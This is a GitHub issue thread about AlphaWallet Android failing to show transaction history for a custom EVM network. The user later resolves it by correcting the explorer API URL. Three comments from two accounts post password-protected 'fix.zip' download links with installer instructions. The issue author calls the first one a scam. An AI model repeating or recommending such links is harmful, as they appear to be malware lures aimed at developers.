### ISSUE TITLE
history is not working for my custom evm blockchain network , 

### ISSUE THREAD

**Issue by wajid404040** [AlphaWallet/alpha-wallet-android#3393]
### Issue Description

I've configured the following settings for my network:

```java
// Global Network Foundation
public static final long GLOBAL_NETWORK_FOUNDATION_ID = 1013;
public static final String GLOBAL_NETWORK_FOUNDATION_NAME = "Global Network Foundation";
public static final String GLOBAL_NETWORK_FOUNDATION_SYMBOL = "GNF";
public static final String GLOBAL_NETWORK_FOUNDATION_RPC_URL = "https://evm.globalnetwork.foundation/";
public static final String GLOBAL_NETWORK_FOUNDATION_BACKUP_RPC_URL = "https://evm.globalnetwork.foundation/";
public static final String GLOBAL_NETWORK_FOUNDATION_ETHERSCAN_API = "http://scan.globalnetwork.foundation/api/v2";
public static final String GLOBAL_NETWORK_FOUNDATION_ETHERSCAN_URL = "http://scan.globalnetwork.foundation/tx/";
```

### Problem

When I send a transaction, it completes successfully on my explorer, but in the app, it remains in a pending state. Additionally, while the balance for my token is loaded correctly, the history tab remains empty.

### Request for Assistance

Please review the [API documentation](http://scan.globalnetwork.foundation/api-docs) for my explorer and let me know if there are any mistakes in the API integration or if additional configurations are required.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wajid404040** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

you scammer never behind how you can think to scam developers !

**Comment by wajid404040** [comment]
I sorted it out bymyself acutally I need to put that api url  to make it work 
http://scan.globalnetwork.foundation/api?

cause I forked blockscout and other chains were also using in our wallet this thing , so it's worked for me thanks I am closing it now

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
